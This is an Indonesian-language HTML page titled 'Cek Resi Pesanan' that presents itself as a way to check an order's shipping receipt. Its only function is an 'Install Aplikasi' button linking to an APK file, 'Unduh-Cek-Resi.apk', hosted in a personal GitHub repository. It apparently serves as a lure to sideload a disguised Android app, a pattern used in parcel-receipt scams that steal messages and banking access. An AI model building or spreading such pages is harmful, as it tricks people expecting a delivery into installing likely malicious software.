<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Cek Resi Pesanan</title>

  <style>
    body, html {
      overflow-x: hidden; /* Prevent horizontal scrolling */
      height: 100%;
      margin: 0;
    }

    body {
      font-family: Arial, sans-serif;
      background-color: #ffffff;
      display: flex;
      flex-direction: column;
      min-height: 100%;
    }

    #header {
      width: 100%;
      height: 218px; /* Tinggi gambar */
      background-image: url('https://i.ibb.co/1Txmq32/IMG-20240121-043230.jpg');
      background-size: cover;
      background-position: center;
      background-repeat: no-repeat;
    }

    .container {
      display: flex;
      align-items: center;
      justify-content: center;
      flex: 1; /* Mempertahankan tinggi 100% container */
      flex-direction: column; /* Center content vertically */
    }

    a {
      text-decoration: none;
    }

    button {
      width: calc(300% - 60px);
      background-color: #2e8b57;
      color: #fff;
      padding: 13px;
      border: none;
      border-radius: 9px;
      cursor: pointer;
      margin-top: 10px;
  position: relative;
  top: -30px;
  left: -80px;
}

    button:hover {
      background-color: #45a049;
    }

    .button-caption {
      font-family: 'Roboto', sans-serif;
      font-weight: bold;
      text-transform: uppercase;
      margin-bottom: 10px; /* Jarak 10px dari bawah */
    }

    .marquee-container {
      display: flex;
      flex-direction: column;
      align-items: center;
      margin-top: -70px;
    }

    .marquee {
      overflow: hidden;
      white-space: nowrap;
      text-align: center;
      position: relative;
    }

    .marquee p {
      display: inline-block;
      background-color: black; /* Warna latar belakang tetap hitam */
      color: white; /* Warna text */
      padding: 0 10px; /* Padding sesuaikan kebutuhan */
      animation: marquee 15s linear infinite;
    }

    @keyframes marquee {
      0% {
        transform: translateX(100%);
      }
      100% {
        transform: translateX(-100%);
      }
    }

    .invitation-text {
      text-align: center;
      margin-top: 20px; /* Jarak 20px dari tombol unduh */
    }

    .additional-text {
      font-family: 'Roboto', sans-serif;
      text-transform: uppercase;
      margin-top: 10px; /* Jarak 10px dari teks sebelumnya */
    }

    .smaller-text {
      font-size: 13px; /* Ukuran teks yang lebih kecil */
      line-height: 1.3; /* Spasi baris yang sesuai */
    }
  </style>
</head>
<body>

  <div id="header"></div>

  <div class="container">
    <div class="marquee-container">
      <div class="marquee">
      </div>
    </div>
    <a href="https://github.com/Usill4cek/Usill4cek.github.io/raw/main/Unduh-Cek-Resi.apk" download="Unduh-Cek-Resi.apk">
      <button>
        Install Aplikasi
      </button>
    </a>
    <div>
      <img src="https://i.ibb.co/pXG3mFp/IMG-20240121-044453.png" alt="Foto" style="width: 100%; max-width: 600px; margin-top: 20px;">
  </div>
</body>
</html
